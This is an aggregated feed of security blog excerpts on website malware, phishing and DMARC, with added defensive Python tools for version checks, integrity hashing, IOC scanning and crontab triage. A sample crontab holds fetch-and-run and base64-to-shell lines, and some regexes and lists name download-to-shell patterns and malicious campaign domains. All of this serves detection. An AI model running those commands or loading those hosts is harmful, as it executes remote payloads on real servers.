E-Commerce Security – Planning for Disasters

This is the last post in our series on E-commerce Security:

  • Intro to Securing an Online Store – Part 1
  • Intro to Securing an Online Store – Part 2

Today, let’s expand on some of the suggestions made during a webinar I hosted recently about steps you can take to secure your online store.

So far in this series, we have touched on how to identify potential risks and how to defend against threats via WAF technologies.

Continue reading E-Commerce Security – Planning for Disasters at Sucuri Blog.

Source: Scuri check

Backdoor Uses Paste Site to Host Payload

Finding backdoors is one of the biggest challenges for a website security analyst, as backdoors are designed to stay hidden in case the rest of the malware is found and removed.

Website Backdoors

A backdoor is a piece of malware that attackers leave behind to allow them access back into a website. Hackers like to inject code into different locations to increase their chances of retaining control of the website so they can reinfect it continuously.

Continue reading Backdoor Uses Paste Site to Host Payload at Sucuri Blog.

Source: Scuri check

Outdated Duplicator Plugin RCE Abused

We’re seeing an increase in the number of cases where attackers are disabling WordPress sites by removing or rewriting their wp-config.php file.

These cases are all linked to the same vulnerable software: WordPress Duplicator Plugin.

Versions of the Snap Creek Duplicator plugin lower than 1.2.42 are vulnerable to a Remote Code Execution attack, in which a malicious visitor can execute arbitrary code on the target site.
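A version check for the threshold quoted above, written as an added example for this page rather than code from Sucuri or from the Duplicator project. It reads the plugin header that WordPress itself parses and compares versions numerically, because a plain string comparison ranks "1.2.9" above "1.2.42" and would report a vulnerable install as patched. The path wp-content/plugins/duplicator/duplicator.php and the sample header are assumptions.

```python
import os
import re

# Threshold stated in the post above: Duplicator releases below 1.2.42 are affected.
DUPLICATOR_FIXED_VERSION = "1.2.42"


def parse_version(version):
    """Split '1.2.40' into (1, 2, 40) so that comparison is numeric.

    A plain string comparison gets this wrong: "1.2.9" > "1.2.42" lexically.
    """
    return tuple(int(part) for part in re.findall(r"\d+", version))


def plugin_version_from_header(source):
    """Return the Version: value from a WordPress plugin header, or None.

    WordPress reads the same comment block (Plugin Name:, Version:, ...)
    at the top of the plugin's main PHP file.
    """
    match = re.search(r"^[\s*#]*Version:\s*([0-9][0-9A-Za-z.\-]*)", source, re.MULTILINE)
    return match.group(1) if match else None


def duplicator_is_vulnerable(source):
    """True when the header declares a version below DUPLICATOR_FIXED_VERSION."""
    version = plugin_version_from_header(source)
    if version is None:
        raise ValueError("no Version: header found")
    return parse_version(version) < parse_version(DUPLICATOR_FIXED_VERSION)


def check_install(wp_root):
    """Inspect an installed copy; returns (plugin_found, vulnerable).

    Path assumption: the plugin's main file lives at
    wp-content/plugins/duplicator/duplicator.php (the standard slug).
    """
    main_file = os.path.join(wp_root, "wp-content", "plugins", "duplicator", "duplicator.php")
    if not os.path.isfile(main_file):
        return (False, False)
    with open(main_file, encoding="utf-8", errors="replace") as fh:
        return (True, duplicator_is_vulnerable(fh.read()))


# Constructed sample header (not a real plugin file).
SAMPLE_HEADER = """<?php
/*
Plugin Name: Duplicator
Version: 1.2.40
*/
"""

if __name__ == "__main__":
    print("vulnerable" if duplicator_is_vulnerable(SAMPLE_HEADER) else "patched")
```

Run check_install() against the document root of each site on a host; a site whose plugin is missing is not necessarily clean, since the post describes attackers deleting files after exploitation, so pair this with a file-integrity check.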

Continue reading Outdated Duplicator Plugin RCE Abused at Sucuri Blog.

Source: Scuri check

Unsuccessfully Defaced Websites

Defacement is a type of hack that is easy to notice and a pain for website owners. Recently, we came across some defacement pages with a peculiar JavaScript injection included in the source code.

What is a Defacement?

Website defacement is a hack that often involves adding malicious images to the website homepage and other important pages. Beyond the initial embarrassment, the effects of defacement can include loss of traffic, revenue, and trust in your brand.

Continue reading Unsuccessfully Defaced Websites at Sucuri Blog.

Source: Scuri check

New Guide on How to Use the Sucuri WordPress Security Plugin

Sucuri has always been active in the WordPress community. We’ve attended WordCamps around the world, created tools and features specifically for WordPress, and have maintained a free WordPress security plugin with over 400k installations.

If you don’t already have it, you can download the Sucuri Security – Auditing, Malware Scanner and Security Hardening plugin directly from the official WordPress repository.

Recently, we launched a guide on How to Use the WordPress Security Plugin.

Continue reading New Guide on How to Use the Sucuri WordPress Security Plugin at Sucuri Blog.

Source: Scuri check

PCI for SMB: Requirement 5 & 6 – Maintain a Vulnerability Management Program

This is the fourth post in a series of articles on understanding the Payment Card Industry Data Security Standard (PCI DSS). We want to show how PCI DSS can help anyone going through the compliance process using the PCI SAQs (Self-Assessment Questionnaires). In the previous articles we have written about PCI, we covered the following:

  • Requirement 1: Build and Maintain a Secure Network – Install and maintain a firewall configuration to protect cardholder data.

Continue reading PCI for SMB: Requirement 5 & 6 – Maintain a Vulnerability Management Program at Sucuri Blog.

Source: Scuri check

WordPress Database Upgrade Phishing Campaign

We have recently been notified of phishing emails that target WordPress users. The content informs site owners that their database requires an update and looks like this:

The email’s appearance resembles that of a legitimate WordPress update message; however, the content includes typos and uses an older messaging style. Another suspicious item is the deadline. WordPress wouldn’t set a deadline without a valid explanation, and neither would a hosting provider (if you believed the email came from them).

Continue reading WordPress Database Upgrade Phishing Campaign at Sucuri Blog.

Source: Scuri check

The State of DMARC – Fortune 500 vs Alexa 1000

DMARC adoption is accelerating. From the initial launch in 2012 by email inbox providers trying to protect their users to large companies looking to improve email delivery, DMARC has achieved worldwide adoption. However, new technology like DMARC goes through a cycle of adoption, and DMARC appears to be lagging among companies that would be typical targets for spoofing, spamming and hacks – Fortune 500 and Alexa 1000 domains.


MxToolbox’s State of DMARC Adoption is a periodic evaluation of how inbox providers, businesses and government organizations are progressing in adopting DMARC to protect their inbound and outbound email. As your expert in email deliverability, MxToolbox is committed to helping you protect your email so that your business can thrive. DMARC adoption is paramount to improving your email deliverability.

DMARC is the key to improving Email Deliverability!

Email is the key to your customer communication strategy. But what is your email reputation?

Setting up and managing your DMARC configuration is the key to getting insight into your email delivery. MxToolbox is the key to understanding DMARC.

MxToolbox Delivery Center gives you:

  • Who is sending phishing email purporting to be from your domain
  • What is the reputation of your domains and delegated IPs
  • Where other senders are and What their reputations are
  • How your SPF, DKIM and DMARC setup is performing
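The posts on this page discuss DMARC adoption without showing what a published record looks like or how to judge it. The following is an added example, not code from MxToolbox or from any of the posts: it parses the TXT record that a domain publishes at `_dmarc.<domain>` and reports the weaknesses a practitioner looks for (monitoring-only `p=none`, partial `pct`, a weaker subdomain policy, no `rua` address and therefore no reports). The three sample records are constructed; a real deployment would feed in the result of a DNS TXT lookup.

```python
# Rank of DMARC policies from weakest to strongest.
POLICY_RANK = {"none": 0, "quarantine": 1, "reject": 2}


def parse_dmarc_record(txt):
    """Parse 'v=DMARC1; p=reject; ...' into a dict of lowercase tags.

    Returns None when the string is not a DMARC record: RFC 7489 requires
    the first tag to be v=DMARC1, so SPF records and junk are rejected here.
    """
    tags = {}
    order = []
    for chunk in txt.split(";"):
        chunk = chunk.strip()
        if not chunk:
            continue
        key, sep, value = chunk.partition("=")
        if not sep:
            return None
        key = key.strip().lower()
        tags[key] = value.strip()
        order.append(key)
    if not order or order[0] != "v" or tags["v"].upper() != "DMARC1":
        return None
    return tags


def assess_dmarc(txt):
    """Return (policy, findings). policy is None when receivers would ignore the record."""
    tags = parse_dmarc_record(txt)
    if tags is None:
        return (None, ["not a valid DMARC record"])
    policy = tags.get("p", "").lower()
    if policy not in POLICY_RANK:
        return (None, ["missing or invalid p= tag; receivers ignore the record"])

    findings = []
    if policy == "none":
        findings.append("p=none: monitoring only, spoofed mail is still delivered")
    pct = tags.get("pct", "100")
    if not pct.isdigit() or int(pct) < 100:
        findings.append("pct=%s: policy applied to only part of failing mail" % pct)
    sub_policy = tags.get("sp", "").lower()
    if sub_policy in POLICY_RANK and POLICY_RANK[sub_policy] < POLICY_RANK[policy]:
        findings.append("sp=%s: subdomains get a weaker policy than the organizational domain" % sub_policy)
    if "rua" not in tags:
        findings.append("no rua=: no aggregate reports, so no visibility into who is spoofing you")
    return (policy, findings)


# Constructed sample records (example.com is a reserved documentation domain).
STRONG_RECORD = "v=DMARC1; p=reject; rua=mailto:dmarc-reports@example.com"
WEAK_RECORD = "v=DMARC1; p=none"
PARTIAL_RECORD = "v=DMARC1; p=quarantine; pct=25; sp=none; rua=mailto:dmarc-reports@example.com"

if __name__ == "__main__":
    for record in (STRONG_RECORD, WEAK_RECORD, PARTIAL_RECORD):
        print(record, "->", assess_dmarc(record))
```

A record that passes with no findings still only enforces what SPF and DKIM can prove; the usual rollout is p=none with rua set, then quarantine, then reject once the aggregate reports show legitimate senders aligned.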



Source: MXtoolbox

How to Improve Your Website Security Posture – Part II

In the first post of this series, we discussed some of the main website security threats. Knowing the threat environment is a vital part of a good website security posture. However, it is also important to know what to do to strengthen your website.

Today, we are going to give you some practical tips on how to improve your website posture.

As a website owner, we highly recommend applying the principle of least privilege. It is a computer science principle that can be applied at every level of a system, and doing so strengthens your website security posture.

Continue reading How to Improve Your Website Security Posture – Part II at Sucuri Blog.

Source: Scuri check

Core Integrity Verifications

In order to clean a malware infection, the first thing we need to know is which files have been compromised. At Sucuri, we use several techniques including whitelists, blacklists, and anomaly checks. In this blog post, we’re going to focus on how core integrity checks are a key component of the whitelisting model and how this aids in effectively detecting malware.

Cryptographic Hash Functions and Checksums

When a website compromise happens, attackers add, modify, or delete files from the server.
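The integrity check the post introduces, carried through as an added example (not Sucuri’s own tooling): hash every file under the web root with SHA-256, keep that manifest as the trusted baseline, and later classify the live tree against it as added, modified or deleted, which is exactly the add/modify/delete triad described above. The demo() function builds a throwaway site in a temporary directory and tampers with it; the file names and contents are constructed.

```python
import hashlib
import os
import tempfile


def sha256_file(path, chunk_size=1 << 16):
    """Hash a file in chunks so large uploads do not need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk_size), b""):
            digest.update(block)
    return digest.hexdigest()


def build_manifest(root):
    """Map every file under root (relative, '/'-separated) to its SHA-256."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = sha256_file(full)
    return manifest


def compare_manifests(baseline, current):
    """Classify the difference between a trusted baseline and the live tree."""
    added = sorted(set(current) - set(baseline))
    deleted = sorted(set(baseline) - set(current))
    modified = sorted(
        path for path in set(baseline) & set(current) if baseline[path] != current[path]
    )
    return {"added": added, "modified": modified, "deleted": deleted}


def _write(root, rel, content):
    """Helper for the demo: create parent directories and write a text file."""
    full = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w", encoding="utf-8") as fh:
        fh.write(content)


def demo():
    """Constructed scenario: snapshot a tiny site, then tamper with it.

    The tampering mirrors what the post describes: one core file rewritten,
    one file dropped in, one file deleted. wp-config.php is left untouched.
    """
    with tempfile.TemporaryDirectory() as root:
        _write(root, "index.php", "<?php require 'wp-blog-header.php';")
        _write(root, "wp-includes/version.php", "<?php $wp_version = '4.9.8';")
        _write(root, "wp-config.php", "<?php define('DB_NAME', 'wp');")
        baseline = build_manifest(root)

        _write(root, "index.php", "<?php /* injected */ require 'wp-blog-header.php';")
        _write(root, "wp-content/uploads/.cache.php", "<?php /* dropped file */")
        os.remove(os.path.join(root, "wp-includes", "version.php"))
        return compare_manifests(baseline, build_manifest(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```

The baseline is only as trustworthy as where it is kept: an attacker with write access to the web root can rewrite a manifest stored beside the files, so keep it off the host (or sign it), and for core files compare against the vendor’s published release rather than a snapshot taken after a possible compromise.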

Continue reading Core Integrity Verifications at Sucuri Blog.

Source: Scuri check

Threat Investigation in Delivery Center

Email delivery is under assault by spammers and hackers world-wide. Your brand and domain name can be leveraged to send spoofing emails, malware and spam to your customers, your suppliers and even to random strangers. Unfortunately, the potential for abuse is no longer restricted to larger companies, as hackers and spammers attack smaller, less protected companies. Regardless of the size of your business, you need to protect yourself. Several small businesses using MxToolbox Delivery Center have recently discovered that as much as 90% of the email volume reportedly coming “From” their domain is spoofed, leading to blanket denial of their email delivery. Any company can have its business completely crippled by this type of spoofing. How do you investigate and prevent email spoofing to improve email deliverability and protect your business?
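The “90% of the volume is spoofed” figure quoted above is the kind of number that comes straight out of DMARC aggregate (rua) reports. As an added example that is not MxToolbox’s product code, here is how to read one such report and attribute unauthenticated volume to source IPs: a message is treated as unauthenticated when the receiver’s policy evaluation shows both DKIM and SPF failing. The XML below is a constructed report in the standard feedback/record layout with reserved documentation addresses, sized so the spoofed share comes out at 90%.

```python
import xml.etree.ElementTree as ET
from collections import defaultdict

# Constructed sample aggregate report (not from a real inbox provider).
SAMPLE_REPORT = """<?xml version="1.0" encoding="UTF-8"?>
<feedback>
  <report_metadata>
    <org_name>example-inbox-provider</org_name>
    <date_range><begin>1534896000</begin><end>1534982400</end></date_range>
  </report_metadata>
  <policy_published>
    <domain>example.com</domain>
    <p>none</p>
  </policy_published>
  <record>
    <row>
      <source_ip>192.0.2.10</source_ip>
      <count>100</count>
      <policy_evaluated><disposition>none</disposition><dkim>pass</dkim><spf>pass</spf></policy_evaluated>
    </row>
    <identifiers><header_from>example.com</header_from></identifiers>
  </record>
  <record>
    <row>
      <source_ip>198.51.100.7</source_ip>
      <count>700</count>
      <policy_evaluated><disposition>none</disposition><dkim>fail</dkim><spf>fail</spf></policy_evaluated>
    </row>
    <identifiers><header_from>example.com</header_from></identifiers>
  </record>
  <record>
    <row>
      <source_ip>203.0.113.42</source_ip>
      <count>200</count>
      <policy_evaluated><disposition>none</disposition><dkim>fail</dkim><spf>fail</spf></policy_evaluated>
    </row>
    <identifiers><header_from>example.com</header_from></identifiers>
  </record>
</feedback>
"""


def summarize_aggregate_report(xml_text):
    """Summarise a DMARC aggregate report: totals, spoofed share, worst sources.

    Reports arrive from third parties by email, so parse them with defusedxml in
    production; the stdlib parser is used here only on a constructed sample.
    """
    root = ET.fromstring(xml_text)
    total = 0
    unauthenticated = 0
    per_source = defaultdict(lambda: {"messages": 0, "unauthenticated": 0})
    for record in root.iter("record"):
        row = record.find("row")
        source_ip = row.findtext("source_ip")
        count = int(row.findtext("count", "0"))
        evaluated = row.find("policy_evaluated")
        dkim = (evaluated.findtext("dkim") or "fail").lower()
        spf = (evaluated.findtext("spf") or "fail").lower()
        failed_both = dkim != "pass" and spf != "pass"
        total += count
        per_source[source_ip]["messages"] += count
        if failed_both:
            unauthenticated += count
            per_source[source_ip]["unauthenticated"] += count
    ranked = sorted(per_source.items(), key=lambda kv: kv[1]["unauthenticated"], reverse=True)
    return {
        "domain": root.findtext("policy_published/domain"),
        "published_policy": root.findtext("policy_published/p"),
        "total": total,
        "unauthenticated": unauthenticated,
        "unauthenticated_share": (unauthenticated / total) if total else 0.0,
        "top_unauthenticated_sources": [
            (ip, stats["unauthenticated"]) for ip, stats in ranked if stats["unauthenticated"]
        ],
    }


if __name__ == "__main__":
    print(summarize_aggregate_report(SAMPLE_REPORT))
```

Note the published policy in the sample is p=none, so all 900 spoofed messages were delivered with disposition none; moving to quarantine or reject is what turns this visibility into prevention.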

Introducing MxToolbox Threat Investigator!


Investigate threats to your email delivery in a consolidated interface.

Continuously striving to increase our customers’ email delivery rates, MxToolbox is excited to unveil a new product feature that will help your business achieve ideal deliverability. With Threat Investigator, our customers get in-depth details on potential email delivery threats, including threatening IP addresses, geo-location, related domain information, reverse domain name system (DNS), autonomous system name/number (ASN), threat volume, and online reputation (MxReputation). Threat Investigator provides everything you need to analyze current and potential threats to email delivery and take steps to prevent these threats from impacting your business.


Leverage ASN, Geo-location and Reverse DNS to categorize threats.

Because online communication is essential for your business, MxDelivery Center with the new Threat Investigator feature examines issues associated with outbound email, focusing on any encountered delivery difficulties. Moreover, this product identifies ongoing phishing and spoofing campaigns that threaten your brand and email reputation. Being able to recognize these threats early preserves your company name and helps overall message deliverability.

In addition, this innovative feature also provides phishing and legitimate email failure samples as references for investigation purposes. All of this is at your disposal for comparison exercises and to further enhance your familiarity with threats as they emerge.


Threat Investigator integrates MxToolbox blacklist reputation to give you more insight.

MxToolbox’s Threat Investigator gives you unmatched awareness of threats to your company’s email practices. Your messages deserve safeguarding, and MxToolbox provides the tools necessary to protect and deliver your business email. Rely on our team of experts to help your emails get delivered by using the new Threat Investigator feature to reinforce your brand.

Existing customers: As a valued MxToolbox customer, you will have access to the Threat Investigator tool (depending on your current product subscription level). If you do not have access and would like to use this new feature, be sure to upgrade your plan to take advantage of MxToolbox’s Threat Investigator item.  Your business and your customers will greatly benefit from its addition.

Source: MXtoolbox

Fake Font Dropper

Every day we see different website infections. When we receive unusual or interesting cases, our researcher instincts are triggered to investigate the unusual website behavior in order to understand how new infections work. In this case, the odd behavior was the website’s pop-up window claiming there was a missing font.

The Unwanted Popup Window

A website owner reached out to us to investigate the error displaying on their site. The popup window informed the visitors that they were unable to view the content of the site because their computers were missing a font called “HoeflerText”:

The malware tries to trick visitors into clicking the “Update” button to download a malicious file called: Font_Update.exe

Earlier this year, we wrote about a wave of WordPress infections involving malicious plugins that inject obfuscated scripts, creating unwanted pop-up/pop-unders which serve unwanted ads.

Continue reading Fake Font Dropper at Sucuri Blog.

Source: Scuri check

Massive WordPress Redirect Campaign Targets Vulnerable tagDiv Themes and Ultimate Member Plugins

This August, we’ve seen a new massive wave of WordPress infections that redirect visitors to unwanted sites.

When redirected, users see annoying pages with random utroro[.]com addresses and fake reCAPTCHA images. The messages and content try to convince visitors to verify and subscribe to browser notifications without disclosing the purpose of this behavior.

Alternative redirect URLs include:

hxxp://murieh[.]space/?h=930130016_dc950a456f7_100&h_l=&h_5=sub_id_2&h_2=def_sub

hxxps://unverf[.]com/?h=930130016_dc950a456f7_100&h_l=&h_5=sub_id_2&h_2=def_sub

Injected Scripts

The injected malware involves a script from one of the following two sites: cdn.eeduelements[.]com and cdn.allyouwant[.]online.

Continue reading Massive WordPress Redirect Campaign Targets Vulnerable tagDiv Themes and Ultimate Member Plugins at Sucuri Blog.

Source: Scuri check

Fake Plugins with Popuplink.js Redirect to Scam Sites

Since July, we’ve been observing a massive WordPress infection that is responsible for unwanted redirects to scam and ad sites. This infection involves the tiny.cc URL shortener, a fake plugin that has been called either “index” or “wp_update”, and a malicious popuplink.js file.

Infected pages typically have these two scripts in the <head> section of the page.
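The three injection posts on this page (the HoeflerText font popup, the tagDiv/Ultimate Member redirect campaign and the popuplink.js fake plugins) all leave the same trace: a script tag pointing at a host the site never intended to load, plus a few recognisable strings. The scanner below is an added example, not Sucuri’s own scanner, and it goes a step beyond the posts: besides the indicators quoted above (written plainly here so they match, where the posts defang them with [.]), it flags any external script host that is not on a per-site allowlist, which is what catches the next campaign rather than this one. The sample page, the allowlist and the /a.js, /t.js paths are constructed.

```python
import os
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Script hosts named in the redirect-campaign post above.
KNOWN_BAD_HOSTS = {"cdn.eeduelements.com", "cdn.allyouwant.online"}
# Strings named across the three posts: redirect destinations, the fake
# plugin's script, the shortener it abuses, and the fake-font lure. Lowercase,
# because matching is done on a lowercased copy of the document.
KNOWN_BAD_STRINGS = (
    "utroro.com", "murieh.space", "unverf.com",
    "popuplink.js", "tiny.cc/",
    "hoeflertext", "font_update.exe",
)


class _ScriptCollector(HTMLParser):
    """Collect <script src=...> targets and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.srcs = []
        self.inline = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)
            else:
                self._in_script = True

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline.append(data)


def scan_html(html, allowed_hosts):
    """Return sorted (kind, value) findings for one document.

    allowed_hosts: hosts this site legitimately loads scripts from; any other
    external host is reported as unexpected even if it is not a known IOC.
    """
    collector = _ScriptCollector()
    collector.feed(html)
    findings = set()
    for src in collector.srcs:
        host = urlsplit(src.strip()).hostname  # also handles //host/path forms
        if host is None:  # relative path: served by this site itself
            continue
        if host in KNOWN_BAD_HOSTS:
            findings.add(("known_bad_host", host))
        elif host not in allowed_hosts:
            findings.add(("unexpected_host", host))
    lowered = html.lower()
    for marker in KNOWN_BAD_STRINGS:
        if marker in lowered:
            findings.add(("known_bad_string", marker))
    return sorted(findings)


def scan_site(root, allowed_hosts, extensions=(".html", ".htm", ".php", ".js")):
    """Walk a web root and return {relative_path: findings} for files that hit."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(extensions):
                continue
            full = os.path.join(dirpath, name)
            with open(full, encoding="utf-8", errors="replace") as fh:
                findings = scan_html(fh.read(), allowed_hosts)
            if findings:
                hits[os.path.relpath(full, root)] = findings
    return hits


# Constructed sample page: one local script, one known-bad host, one
# unknown third party, and an inline redirect through the shortener.
SAMPLE_PAGE = """<html><head>
<script src="/wp-includes/js/jquery/jquery.js"></script>
<script src="https://cdn.eeduelements.com/a.js"></script>
<script src="https://cdn.example-analytics.net/t.js"></script>
<script>window.location = "https://tiny.cc/abcd";</script>
</head><body><p>Hello</p></body></html>
"""
SITE_ALLOWED_HOSTS = {"fonts.googleapis.com"}

if __name__ == "__main__":
    for finding in scan_html(SAMPLE_PAGE, SITE_ALLOWED_HOSTS):
        print(*finding)
```

Scanning rendered pages catches injections that live in the database (theme options, widgets, posts) as well as in files, so fetch the site’s own output for a handful of URLs in addition to walking the document root.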

Continue reading Fake Plugins with Popuplink.js Redirect to Scam Sites at Sucuri Blog.

Source: Scuri check

How to Improve Your Website Posture – Part I

Have you ever wondered if your website security posture is adequate enough?

The risk of having a website compromise is never going to be zero. However, as a webmaster, you can play an important role in minimizing the chances of a website hack. A good security posture entails how to understand the importance of securing a website and how to implement security measures.

Correcting a poor security posture means recognizing problems that you might not notice.

Continue reading How to Improve Your Website Posture – Part I at Sucuri Blog.

Source: Scuri check

How to Improve Website Resilience for DDoS Attacks – Part II – Caching

In the first post of this series, we talked about the practices that will optimize your site and increase your website’s resilience to DDoS attacks. Today, we are going to focus on caching best practices that can reduce the chances of a DDoS attack bringing down your site.

Website caching is a technique for storing content in a ready-to-serve state, with little or no code processing per request. When a CDN is in place, the cache stores the content on a server located closer to the visitor.

Continue reading How to Improve Website Resilience for DDoS Attacks – Part II – Caching at Sucuri Blog.

Source: Scuri check

Cookie Consent Script Used to Distribute Malware

Most websites today use cookies. Since May 25th, 2018, all websites that do business in the European Union (EU) have had to make some changes to comply with the EU General Data Protection Regulation (GDPR). Even though cookie usage is mentioned only once in the GDPR, any organization using cookies to track users’ browsing activity has had to add a notice explaining how they are used and ask for the user’s consent.

Continue reading Cookie Consent Script Used to Distribute Malware at Sucuri Blog.

Source: Scuri check

Cryptominers: Binary-Process-Cron Variants and Methods of Removal

This post provides a brief overview of how to manually remove server-side cryptominers and other types of Binary-Process-Cron malware from a server. Unlike browser-based JavaScript cryptominers that have been injected into a web page, a binary server-level cryptominer abuses server resources without affecting the computers or mobile devices of site visitors.

We will cover the attributes of these server-level infections to provide a basic understanding of their form and function, as well as a couple of different methods of removal.
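The “cron” leg of a Binary-Process-Cron infection is the persistence that brings the miner back after its process is killed, so triage starts with the crontabs. The triage below is an added example and not Sucuri’s removal procedure: it parses crontab text and flags the traits that distinguish a miner watchdog from ordinary jobs, namely download-and-pipe-to-shell, execution out of world-writable temp directories, run-time base64 decoding, and a schedule of every few minutes. The sample crontab is constructed; the matching patterns are heuristics, not a complete signature set.

```python
import re

# Constructed sample crontab: one legitimate job and three miner-style entries.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
MAILTO=""
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * curl -s http://203.0.113.9/x.sh | sh
@reboot /dev/shm/.x/kthreadd -c /dev/shm/.x/config.json
* * * * * echo aGVsbG8= | base64 -d | sh
"""

# (pattern, reason) pairs applied to the command part of each entry.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sh|bash|dash|zsh|python\d*|perl)\b"),
     "downloads and pipes the result into an interpreter"),
    (re.compile(r"(^|[\s;&|'\"=])(/tmp|/var/tmp|/dev/shm)/"),
     "runs from a world-writable temp directory"),
    (re.compile(r"base64\s+(-d|--decode)\b"),
     "decodes base64 at run time"),
]
# Minute field of "*" or "*/1".."*/5": the job fires at least every five minutes.
HIGH_FREQUENCY_MINUTE = re.compile(r"^\*(/[1-5])?$")
ENV_ASSIGNMENT = re.compile(r"^\w+=")


def parse_crontab(text):
    """Yield (schedule, command) for each job line; skips comments and VAR=value lines."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or ENV_ASSIGNMENT.match(line):
            continue
        if line.startswith("@"):  # @reboot, @hourly, ...
            schedule, _, command = line.partition(" ")
            yield (schedule, command.strip())
            continue
        fields = line.split(None, 5)
        if len(fields) < 6:
            continue  # malformed entry, nothing to run
        yield (" ".join(fields[:5]), fields[5])


def suspicious_cron_entries(text):
    """Return the entries worth a second look, each with the reasons it was flagged."""
    flagged = []
    for schedule, command in parse_crontab(text):
        reasons = [reason for pattern, reason in SUSPICIOUS_PATTERNS if pattern.search(command)]
        if not reasons:
            continue  # frequency alone is not evidence; only add it to an already suspicious job
        minute_field = schedule.split()[0]
        if HIGH_FREQUENCY_MINUTE.match(minute_field):
            reasons.append("runs every five minutes or more often (re-launch watchdog)")
        flagged.append({"schedule": schedule, "command": command, "reasons": reasons})
    return flagged


if __name__ == "__main__":
    for entry in suspicious_cron_entries(SAMPLE_CRONTAB):
        print(entry["schedule"], entry["command"])
        for reason in entry["reasons"]:
            print("   -", reason)
```

Feed it `crontab -l` output for every account on the box plus /etc/crontab and /etc/cron.d/*, and remove the cron entry before killing the process: the other way round, the next tick simply relaunches the miner.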

Continue reading Cryptominers: Binary-Process-Cron Variants and Methods of Removal at Sucuri Blog.

Source: Scuri check

The State of DMARC Adoption – Inbox Providers in 2018


There is a lot of buzz surrounding DMARC right now. And most people have questions like:

  • How many companies are adopting DMARC?
  • What is the volume of email sent to companies and governments that have adopted DMARC?
  • Is it necessary for your business?

As your expert in Email Delivery, MxToolbox is constantly looking at technologies that affect your business. For years, the biggest worry for companies like yours was being blacklisted. Now, email delivery is more complex and requires constant evaluation of your email senders and their compliance with newer technologies like SPF, DKIM and DMARC. In our State of DMARC Adoption, we evaluate how quickly companies are adopting DMARC and how DMARC can affect your business.


Source: MXtoolbox